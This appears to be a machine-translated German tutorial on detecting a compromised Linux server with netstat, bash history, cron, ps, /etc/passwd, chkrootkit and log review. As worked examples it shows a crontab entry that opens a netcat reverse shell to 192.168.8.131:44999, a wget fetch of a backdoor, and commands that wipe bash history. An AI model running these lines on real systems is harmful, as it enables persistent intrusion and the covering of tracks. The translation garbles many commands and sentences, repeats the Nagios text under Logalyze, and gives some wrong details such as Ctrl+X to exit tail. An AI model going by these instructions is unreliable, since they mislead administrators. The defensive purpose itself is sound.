Netstat
NetStat ist ein wichtiges TCP/IP-Netzwerk-Dienstprogramm für Befehlszeilen, das Informationen und Statistiken über die Verwendung von Protokollen und aktive Netzwerkverbindungen bereitstellt.
Wir werden verwenden Netstat Auf einem Beispiel -Opfermaschine über den folgenden Befehl nach etwas Verdächtigem in den aktiven Netzwerkverbindungen:
Ubuntu@Ubuntu: ~ $ netstat -antp
Hier sehen wir alle aktuell aktiven Verbindungen. Jetzt werden wir nach einem suchen Verbindung, die nicht da sein sollte.
Hier ist es eine aktive Verbindung am Port 44999 (Ein Port, der nicht geöffnet sein sollte).Wir können andere Details zur Verbindung sehen, wie z. B. die PID, und der Programmname, der in der letzten Spalte ausgeführt wird. In diesem Fall die PID Ist 1555 und die böswillige Nutzlast, die es ausführt, ist die ./Hülse.Elf Datei.
Ein weiterer Befehl, der nach den derzeit zuhörenden und aktiven Ports auf Ihrem System checkt, ist wie folgt:
Ubuntu@Ubuntu: ~ $ netstat -la
Dies ist eine ziemlich unordentliche Ausgabe. Um die Hör- und etablierten Verbindungen herauszufiltern, verwenden wir den folgenden Befehl:
Ubuntu@Ubuntu: ~ $ netstat -la | Grep "Hören Sie" "etabliert"
Dies gibt Ihnen nur die Ergebnisse, die für Sie wichtig sind, damit Sie diese Ergebnisse leichter sortieren können. Wir können eine aktive Verbindung auf sehen Port 44999 In den obigen Ergebnissen.
Nachdem Sie den böswilligen Prozess erkannt haben, können Sie den Prozess durch folgende Befehle abtöten. Wir werden die bemerken PID des Prozesses unter Verwendung des Befehls netstat und töten Sie den Prozess über den folgenden Befehl:
Ubuntu@Ubuntu: ~ $ Kill 1555
~.Bash-History
Linux hält einen Datensatz, von dem Benutzer sich in das System angemeldet haben, von welchem IP, wann und wie lange.
Sie können auf diese Informationen mit dem zugreifen zuletzt Befehl. Die Ausgabe dieses Befehls wäre wie folgt:
Ubuntu@Ubuntu: ~ $ letztes
Die Ausgabe zeigt den Benutzernamen in der ersten Spalte, das Terminal in der zweiten, die Quelladresse in der dritten, die Anmeldezeit in der vierten Spalte und die Gesamtsitzungszeit in der letzten Spalte. In diesem Fall die Benutzer Usman Und Ubuntu sind immer noch angemeldet. Wenn Sie eine Sitzung sehen, die nicht autorisiert ist oder böswillig aussieht, lesen Sie den letzten Abschnitt dieses Artikels.
Die Protokollierungsgeschichte wird in gespeichert ~.Bash-History Datei. Die Geschichte kann also leicht entfernt werden, indem die löscht .Bash-History Datei. Diese Aktion wird häufig von Angreifern ausgeführt, um ihre Spuren abzudecken.
Ubuntu@Ubuntu: ~ $ cat .bash_history
In diesem Befehl werden die auf Ihrem System ausgeführten Befehle angezeigt, wobei der neueste Befehl unten auf der Liste ausgeführt wird.
Die Geschichte kann über den folgenden Befehl gelöscht werden:
Ubuntu@Ubuntu: ~ $ History -c
Dieser Befehl löscht den Verlauf nur aus dem Terminal, das Sie derzeit verwenden. Es gibt also eine korrektere Möglichkeit, dies zu tun:
Ubuntu@Ubuntu: ~ $ cat/dev/null> ~//.bash_history
Dadurch wird der Inhalt des Verlaufs gelöscht, hält die Datei jedoch an Ort und Stelle. Wenn Sie also nur Ihr aktuelles Login sehen, nachdem Sie das ausgeführt haben zuletzt Befehl, dies ist überhaupt kein gutes Zeichen. Dies weist darauf hin, dass Ihr System möglicherweise kompromittiert wurde und der Angreifer die Geschichte wahrscheinlich gelöscht hat.
Wenn Sie einen böswilligen Benutzer oder IP vermuten, melden Sie sich als dieser Benutzer an und führen Sie den Befehl aus Geschichte, folgendermaßen:
Ubuntu@Ubuntu: ~ $ su
Ubuntu@Ubuntu: ~ $ Geschichte
In diesem Befehl wird der Befehlsgeschichte angezeigt, indem die Datei gelesen wird .Bash-History im /heim Ordner dieses Benutzers. Suchen Sie sorgfältig nach wget, Locken, oder netcat Befehle, falls der Angreifer diese Befehle zum Übertragen von Dateien oder zur Installation von Repo-Tools wie Crypto-Miners oder Spam-Bots verwendete.
Schauen Sie sich das Beispiel unten an:
Oben können Sie den Befehl sehen “WGet https: // github.com/sajith/mod-rootme.” In diesem Befehl versuchte der Hacker, mithilfe einer Repo -Datei auf eine Repo -Datei zuzugreifen wget So laden Sie eine Hintertür mit dem Namen "Mod-Root Me" herunter und installieren Sie ihn auf Ihrem System. Dieser Befehl in der Geschichte bedeutet, dass das System kompromittiert und von einem Angreifer zurückgegriffen wurde.
Denken Sie daran, diese Datei kann handlich ausgewiesen oder ihre Substanz erzeugt werden. Die durch diesen Befehl angegebenen Daten dürfen nicht als eindeutige Realität angesehen werden. In dem Fall, dass der Angreifer einen „schlechten“ Befehl gab und es versäumt hat, die Geschichte zu evakuieren, wird er dort sein.
Zeitgesteuerte Aufgaben
Cron -Jobs können als wichtiges Werkzeug dienen, wenn sie so konfiguriert werden. Das Bearbeiten von Cron Jobs ist eine wichtige Fähigkeit, und so zu wissen, wie man sie sieht.
Um die für den aktuellen Benutzer ausgeführten Cron -Jobs anzuzeigen, verwenden wir den folgenden Befehl:
Ubuntu@Ubuntu: ~ $ crontab -l
Um die Cron -Jobs anzuzeigen, die für einen anderen Benutzer ausgeführt werden (in diesem Fall Ubuntu), verwenden wir den folgenden Befehl:
Ubuntu@Ubuntu: ~ $ crontab -u Ubuntu -l
Um die täglichen, stündlichen, wöchentlichen und monatlichen Cron -Jobs zu sehen, werden wir folgende Befehle verwenden:
Tägliche Cron -Jobs:
Ubuntu@Ubuntu: ~ $ ls -la /etc /cron.täglich
Stündliche Cron -Jobs:
Ubuntu@Ubuntu: ~ $ ls -la /etc /cron.stündlich
Wöchentliche Cron -Jobs:
Ubuntu@Ubuntu: ~ $ ls -la /etc /cron.wöchentlich
Nehmen Sie ein Beispiel:
Der Angreifer kann einen Cron -Job einsetzen /etc/crontab Das läuft eine böswillige Kommando 10 Minuten nach jeder Stunde. Der Angreifer kann auch einen böswilligen Service oder eine Rückseite der Back -Shell -Hintertür über durchführen netcat oder ein anderer Dienstprogramm. Wenn Sie den Befehl ausführen $ ~ crontab -l, Sie werden sehen, wie ein Cron -Job unter:
Ubuntu@Ubuntu: ~ $ crontab -l
CT = $ (Crontab -l)
Ct = $ ct $ '\ n10 * * * * nc -e /bin /bash 192.168.8.131 44999 '
printf "$ ct" | Crontab -
PS Aux
Um ordnungsgemäß zu überprüfen, ob Ihr System kompromittiert wurde, ist es auch wichtig, laufende Prozesse anzusehen. Es gibt Fälle, in denen einige nicht autorisierte Prozesse nicht genügend CPU -Nutzung konsumieren, um in der aufgeführt zu werden Spitze Befehl. Hier werden wir die verwenden ps Befehl, alle aktuell ausgeführten Prozesse anzuzeigen.
Ubuntu@Ubuntu: ~ $ PS Auxf
Die erste Spalte zeigt den Benutzer an, die zweite Spalte zeigt eine eindeutige Prozess -ID an, und die CPU- und Speicherverbrauch werden in den nächsten Spalten angezeigt.
Diese Tabelle bietet Ihnen die meisten Informationen. Sie sollten jeden laufenden Prozess untersuchen, um nach etwas Besonderem zu suchen, um zu wissen, ob das System beeinträchtigt ist oder nicht. Für den Fall, dass Sie etwas Verdächtiges finden, googeln Sie es oder führen Sie es mit dem aus LSOF Befehl, wie oben gezeigt. Dies ist eine gute Angewohnheit zu rennen ps Befehle auf Ihrem Server und es erhöht Ihre Chancen, etwas Verdächtiges oder aus Ihrem täglichen Routine herauszufinden.
/etc/passwd
Der /etc/passwd Die Datei verfolgt jeden Benutzer im System. Dies ist eine dicker getrennte Datei mit Informationen wie Benutzername, BenutzerID, verschlüsselt.
Wenn ein Angreifer in Ihr System hackt, besteht die Möglichkeit, dass er oder sie weitere Benutzer erstellt, um die Dinge getrennt zu halten oder eine Hintertür in Ihrem System zu erstellen, um mit dieser Hintertür wieder zu erreichen. Während Sie überprüfen, ob Ihr System kompromittiert wurde, sollten Sie auch jeden Benutzer in der Datei /etc /passwd überprüfen. Geben Sie dazu den folgenden Befehl ein:
Ubuntu@Ubuntu: ~ $ cat etc/passwd
Dieser Befehl gibt Ihnen eine ähnliche Ausgabe wie unten:
Gnome-initial-Setup: x: 120: 65534 ::/run/gnome-initial-setup/:/bin/false
GDM: X: 121: 125: GNOME Display Manager:/var/lib/gdm3:/bin/false
Usman: x: 1000: 1000: Usman:/home/usman:/bin/bash
Postgres: x: 122: 128: postgresql Administrator ,,,:/var/lib/postgresql:/bin/bash
Debian-tor: x: 123: 129 ::/var/lib/tor:/bin/false
Ubuntu: x: 1001: 1001: Ubuntu ,,,:/home/ubuntu:/bin/bash
LightDM: x: 125: 132: Light Display Manager:/var/lib/lightDM:/bin/false
Debian-Gdm: X: 124: 131: Gnome Display Manager:/var/lib/gdm3:/bin/false
Anonymous: x: 1002: 1002: ,,,,:/home/anonymous:/bin/bash
Jetzt möchten Sie nach jedem Benutzer suchen, von dem Sie sich nicht bewusst sind. In diesem Beispiel sehen Sie einen Benutzer in der Datei mit dem Namen „Anonymous.Eine weitere wichtige Sache, die zu beachten ist, ist, dass der Benutzer, wenn der Angreifer einen Benutzer zum Anmelden erstellt hat, auch eine "/bin/bash" -Schell zugewiesen hat. Sie können also Ihre Suche eingrenzen, indem Sie die folgende Ausgabe ausgraben:
Ubuntu@Ubuntu: ~ $ cat /etc /passwd | grep -i "/bin/bash"
Usman: x: 1000: 1000: Usman:/home/usman:/bin/bash
Postgres: x: 122: 128: postgresql Administrator ,,,:/var/lib/postgresql:/bin/bash
Ubuntu: x: 1001: 1001: Ubuntu ,,,:/home/ubuntu:/bin/bash
Anonymous: x: 1002: 1002: ,,,,:/home/anonymous:/bin/bash
Sie können weitere „Bash -Magie“ durchführen, um Ihre Ausgabe zu verfeinern.
Ubuntu@Ubuntu: ~ $ cat /etc /passwd | grep -i "/bin/bash" | schneiden -d ":" -f 1
Usman
Postgres
Ubuntu
anonym
Finden
Zeitbasierte Suchanfragen sind nützlich für schnelle Triage. Der Benutzer kann auch die Datei ändern, die Zeitstempel ändern. Um die Zuverlässigkeit zu verbessern, geben Sie CTime in die Kriterien ein, da es viel schwieriger ist, sich zu manipulieren, da es Änderungen einiger Level -Dateien erfordert.
Sie können den folgenden Befehl verwenden, um Dateien zu finden, die in den letzten 5 Tagen erstellt und geändert wurden:
Ubuntu@Ubuntu: ~ $ find / -mtime -o -ctime -5
Um alle SUID -Dateien zu finden, die dem Root gehören, und um zu überprüfen, ob unerwartete Einträge in den Listen vorhanden sind, verwenden wir den folgenden Befehl:
Ubuntu@Ubuntu: ~ $ find / -perm -4000 -User -Root -Typ F
Um alle SGID -Dateien (Set User ID) zu finden, die dem Stamm sind, und zu überprüfen, ob unerwartete Einträge in den Listen vorhanden sind, verwenden wir den folgenden Befehl:
Ubuntu@Ubuntu: ~ $ find / -perm -6000 -Typ f f
Chkrootkit
Rootkits sind eines der schlimmsten Dinge, die mit einem System passieren können und einer der gefährlichsten Angriffe sind, gefährlicher als Malware und Viren, sowohl in dem Schaden, den sie dem System verursachen, als auch Schwierigkeiten bei der Suche und Erkennung.
Sie sind so gestaltet, dass sie verborgen bleiben und böswillige Dinge wie Diebstahl von Kreditkarten und Online -Banking -Informationen erledigen. Rootkits Geben Sie Cyberkriminellen die Möglichkeit, Ihr Computersystem zu steuern. RootKits helfen dem Angreifer auch, Ihre Tastenanschläge zu überwachen und Ihre Antiviren -Software zu deaktivieren, was es noch einfacher macht, Ihre privaten Informationen zu stehlen.
Diese Art von Malware kann lange in Ihrem System bleiben, ohne dass der Benutzer es einmal bemerkt, und kann schwerwiegende Schäden verursachen. Einmal der Rootkit Es wird erkannt, es gibt keinen anderen Weg, als das gesamte System neu zu installieren. Manchmal können diese Angriffe sogar Hardwarefehler verursachen.
Zum Glück gibt es einige Tools, die zur Erkennung helfen können Rootkits Auf Linux -Systemen wie Lynis, Clam AV oder LMD (Linux Malware Detect). Sie können Ihr System auf Bekannte überprüfen Rootkits Verwenden Sie die folgenden Befehle.
Installieren Sie zuerst Chkrootkit über den folgenden Befehl:
Ubuntu@Ubuntu: ~ $ sudo APT Installieren Sie Chkrootkit
Dadurch wird die installiert Chkrootkit Werkzeug. Mit diesem Tool können Sie über den folgenden Befehl nach RootKits überprüfen:
Ubuntu@Ubuntu: ~ $ sudo chkrootkit
Das Chkrootkit -Paket besteht aus einem Shell -Skript, das Systembinärdateien für Rootkit -Änderungen sowie mehrere Programme überprüft, die nach verschiedenen Sicherheitsproblemen suchen. Im obigen Fall wurde das Paket auf ein Zeichen von Rootkit im System überprüft und fand keine. Nun, das ist ein gutes Zeichen!
Linux -Protokolle
Linux -Protokolle geben einen Zeitplan für Ereignisse im Linux -Arbeitsbereich und im Linux. Die primäre Aufgabe, die ein Administrator ausführen muss, wenn er oder sie herausfindet, dass das System beeinträchtigt ist.
Bei expliziten Problemen bei Arbeitsbereichsanwendungen werden die Protokolldatensätze mit verschiedenen Bereichen in Verbindung gehalten. Zum Beispiel komponiert Chrome Crashmeldungen an Absturzberichte '~/.Chrom-/Crash -Berichte '), Wenn eine Arbeitsbereichsanwendung auf dem Ingenieur angewiesen ist und angezeigt wird, ob die Anwendung benutzerdefinierte Protokollanordnung berücksichtigt. Aufzeichnungen sind in der/var/log Verzeichnis. Es gibt Linux -Protokolle für alles: Framework, Portion, Bündel Chiefs, Startformulare, Xorg, Apache und MySQL. In diesem Artikel konzentriert sich das Thema explizit auf Linux -Framework -Protokolle.
Sie können diesen Katalog mithilfe der Vertragsdiskorienreihenfolge in diesen Katalog ändern. Sie sollten Root -Berechtigungen haben, um Protokolldateien anzuzeigen oder zu ändern.
Ubuntu@Ubuntu: ~ $ cd /var /log
Anweisungen zum Anzeigen von Linux -Protokollen
Verwenden Sie die folgenden Befehle, um die erforderlichen Protokolldokumente anzuzeigen.
Linux -Protokolle sind mit dem Befehl zu sehen CD /var /log, An diesem Punkt, indem Sie die Reihenfolge komponieren, um die Protokolle unter diesem Katalog zu sehen. Eines der bedeutendsten Protokolle ist die Syslog, welche viele wichtige Protokolle protokolliert.
Ubuntu@Ubuntu: Katzensyslog
Um die Ausgabe zu sanieren, werden wir die “verwenden“weniger" Befehl.
Ubuntu@Ubuntu: Cat Syslog | weniger
Geben Sie den Befehl ein var/log/syslog Einige Dinge unter dem sehen Syslog -Datei. Die Fokussierung auf ein bestimmtes Problem wird einige Zeit dauern, da dieser Datensatz normalerweise lang ist. Drücken.”
Sie können die Protokolle ebenfalls mithilfe von DMESG sehen, die den Teilringunterstützung druckt. Diese Funktion druckt alles und sendet Sie so weit wie möglich entlang des Dokuments. Ab diesem Zeitpunkt können Sie die Reihenfolge nutzen dmesg | weniger durch den Ertrag zu schauen. In dem Fall, dass Sie die Protokolle für den gegebenen Benutzer sehen müssen, müssen Sie den folgenden Befehl ausführen:
dmesg - facility = user
Zusammenfassend können Sie die Heckreihenfolge verwenden, um die Protokolldokumente anzuzeigen. Es ist ein winziges, aber nützliches Dienstprogramm, das man verwenden kann, da es verwendet wird, um den letzten Teil der Protokolle anzuzeigen, in dem das Problem höchstwahrscheinlich aufgetreten ist. Sie können auch die Anzahl der letzten Bytes oder Zeilen angeben, die im Schwanzbefehl angezeigt werden können. Verwenden Sie dazu den Befehl Schwanz/var/log/syslog. Es gibt viele Möglichkeiten, Protokolle zu betrachten.
Geben Sie für eine bestimmte Anzahl von Zeilen (das Modell berücksichtigt die letzten 5 Zeilen) den folgenden Befehl ein:
Ubuntu@Ubuntu: ~ $ Tail -f -n 5/var/log/syslog
Dadurch werden die neuesten 5 Zeilen gedruckt. Wenn eine andere Linie kommt, wird der erstere evakuiert. Drücken Sie Strg+x, um von der Schwanzbestellung wegzukommen.
Wichtige Linux -Protokolle
Die primären vier Linux -Protokolle umfassen:
Ubuntu@Ubuntu: Cat Syslog | weniger
Ubuntu@Ubuntu: Cat Auth.Protokoll | weniger
Ubuntu@Ubuntu: Katzenstiefel.Protokoll | weniger
Ubuntu@Ubuntu: Cat Mailog | weniger
Ubuntu@Ubuntu: Katzenkern | weniger
Ubuntu@Ubuntu: Cat Dmesg | weniger
Ubuntu@Ubuntu: Cat Faillog | weniger
Ubuntu@Ubuntu: Cat Cron | weniger
Ubuntu@Ubuntu: Cat Yum.Protokoll | weniger
Ubuntu@Ubuntu: Cat httpd | weniger
Ubuntu@Ubuntu: Cat Mysqld.Protokoll | weniger
Tools zum Anzeigen von Linux -Protokollen
Es sind heute viele Open -Source -Protokoll -Tracker und Prüfungsgeräte zugänglich, so. Die kostenlosen und Open -Source -Protokollprüfer können an jedem System arbeiten, um die Aufgabe zu erledigen. Hier sind fünf der besten, die ich in der Vergangenheit verwendet habe, in keiner bestimmten Reihenfolge.
Graylog
Graylog wurde 2011 in Deutschland begonnen und wird derzeit entweder als Open -Source -Gerät oder als Geschäftsanordnung angeboten. Graylog soll ein rundes, protokolliertes Framework sein, das Informationsströme von verschiedenen Servern oder Endpunkten empfängt und Sie ermöglicht, diese Daten schnell zu durchwenden oder zu zerstören.
Graylog hat aufgrund seiner Einfachheit und Vielseitigkeit eine positive Bekanntheit unter den Rahmenköpfen zusammengestellt. Die meisten Webunternehmen beginnen wenig, können sich jedoch exponentiell entwickeln. Graylog kann Stapel an einem System von Backend -Servern anpassen und jeden Tag ein paar Terabyte Protokollinformationen verarbeiten.
Es wird vorläuft. Graylog arbeitet um die Idee von Dashboards, mit der Benutzer die Art von Messungen oder Informationsquellen auswählen können, die sie nach einiger Zeit wichtige Steigungen finden, die sie schnell beobachten und schnell beobachten.
Wenn eine Sicherheits- oder Ausführungs -Episode auftritt. Die Suchfunktion von Graylog macht diese Aufgabe einfach. Dieses Tool hat bei der Anpassung an interne Fehler gearbeitet.
Nagios
Nagios wurde 1999 von einem einzigen Entwickler begonnen und hat seitdem in eines der soliden Open -Source -Instrumente für die Überwachung der Protokollinformationen eingebaut. Die vorliegende Wiedergabe von Nagios kann in Servern implementiert werden, die jede Art von Betriebssystem ausführen (Linux, Windows usw.).
Das wesentliche Element von Nagios ist ein Protokollserver, das das Informationsortiment optimiert und den Rahmenbedingungen schrittweise zur Verfügung stellt. Der Nagios-Protokollservermotor fängt Informationen allmählich an und versorgt sie in ein bahnbrechendes Suchinstrument. Die Einbeziehung mit einem anderen Endpunkt oder einer anderen Anwendung ist eine einfache Trinkgeld für diesen Assistenten der inhärenten Anordnung.
Nagios wird häufig in Assoziationen verwendet, die die Sicherheit ihrer Nachbarschaften untersuchen müssen, und können einen Umfang systembezogener Anlässe überprüfen. Nagios können so programmiert werden, dass bestimmte Aufgaben erfüllt werden, wenn ein bestimmter Zustand erfüllt ist, sodass Benutzer Probleme noch vor dem Einbeziehung der Bedürfnisse eines Menschen erkennen können.
Als Hauptaspekt der Bewertung der Systeme wird Nagios Protokollinformationen kanalisieren, die von dem geografischen Bereich abhängen, in dem es beginnt. Komplette Dashboards mit Mapping Innovation können implementiert werden, um das Streaming des Webverkehrs zu sehen.
Logalyz
Logalyze produziert Open-Source-Tools für Framework-Direktoren oder Sys-Administratoren und Sicherheitsspezialisten, um sie bei den Überwachungsserverprotokollen zu unterstützen und sich darauf zu konzentrieren, die Protokolle in wertvolle Informationen umzuwandeln. Das wesentliche Element dieses Tools ist, dass es als kostenlosen Download für Zuhause oder für die Geschäftsanwendung zugänglich ist.
Das wesentliche Element von Nagios ist ein Protokollserver, das das Informationsortiment optimiert und den Rahmenbedingungen schrittweise zur Verfügung stellt. Der Nagios-Protokollservermotor fängt Informationen allmählich an und versorgt sie in ein bahnbrechendes Suchinstrument. Die Einbeziehung mit einem anderen Endpunkt oder einer anderen Anwendung ist eine einfache Trinkgeld für diesen Assistenten der inhärenten Anordnung.
Nagios wird häufig in Assoziationen verwendet, die die Sicherheit ihrer Nachbarschaften untersuchen müssen, und können einen Umfang systembezogener Anlässe überprüfen. Nagios können so programmiert werden, dass bestimmte Aufgaben erfüllt werden, wenn ein bestimmter Zustand erfüllt ist, sodass Benutzer Probleme noch vor dem Einbeziehung der Bedürfnisse eines Menschen erkennen können.
Als Hauptaspekt der Bewertung der Systeme wird Nagios Protokollinformationen kanalisieren, die von dem geografischen Bereich abhängen, in dem es beginnt. Komplette Dashboards mit Mapping Innovation können implementiert werden, um das Streaming des Webverkehrs zu sehen.
Was sollten Sie tun, wenn Sie kompromittiert wurden??
Die Hauptsache ist nicht in Panik, insbesondere wenn die nicht autorisierte Person derzeit signiert ist. Sie sollten die Möglichkeit haben, die Kontrolle über die Maschine zurückzuerobern, bevor die andere Person weiß, dass Sie davon Bescheid wissen. Für den Fall, dass sie wissen, dass Sie sich ihrer Anwesenheit bewusst sind, kann der Angreifer Sie möglicherweise von Ihrem Server fernhalten und Ihr System zerstören. Wenn Sie nicht so technisch sind, müssen Sie nur den gesamten Server sofort abschalten. Sie können den Server über die folgenden Befehle herunterladen:
Ubuntu@Ubuntu: ~ $ schaltdown -h jetzt
Oder
Ubuntu@Ubuntu: ~ $ SystemCTL Poweroff
Eine andere Möglichkeit, dies zu tun. Sobald der Server ausgeschaltet ist, können Sie an den benötigten Firewall -Regeln arbeiten und sich mit jedem um Unterstützung in Ihrer eigenen Zeit wenden.
Falls Sie sich selbstbewusster fühlen und Ihr Hosting -Anbieter über eine vorgelagerte Firewall verfügt, erstellen und aktivieren Sie dann nach zwei Regeln:
Verwenden Sie den folgenden Befehl, um nach aktiven SSH -Sitzungen zu überprüfen:
Ubuntu@Ubuntu: ~ $ SS | Grep Ssh
Verwenden Sie den folgenden Befehl, um ihre SSH -Sitzung zu töten:
Ubuntu@Ubuntu: ~ $ Kill
Dadurch wird ihre SSH -Sitzung getötet und Ihnen Zugriff auf den Server erhalten. Falls Sie keinen Zugriff auf eine vorgelagerte Firewall haben, müssen Sie die Firewall -Regeln auf dem Server selbst erstellen und aktivieren. Wenn dann die Firewall -Regeln eingerichtet sind, töten Sie die SSH -Sitzung des nicht autorisierten Benutzers über den Befehl "Kill".
Eine letzte Technik, soweit verfügbar, melden Sie sich mithilfe einer außerhalb des Bandes, z. B. einer seriellen Konsole, beim Server an. Stoppen Sie alle Netzwerke über den folgenden Befehl:
Ubuntu@Ubuntu: ~ $ SystemCTL STOP -Netzwerk.Service
Dadurch wird jedes System, das zu Ihnen kommt.
Sobald Sie die Kontrolle über den Server wiedererlangt haben, vertrauen Sie ihm nicht leicht. Versuchen Sie nicht, die Dinge zu reparieren und sie wiederverwenden. Was kaputt ist, kann nicht festgelegt werden. Sie würden nie wissen, was ein Angreifer tun könnte, und Sie sollten also nie sicher sein, dass der Server sicher ist. Die Neuinstallation sollte also Ihr Abschluss sein.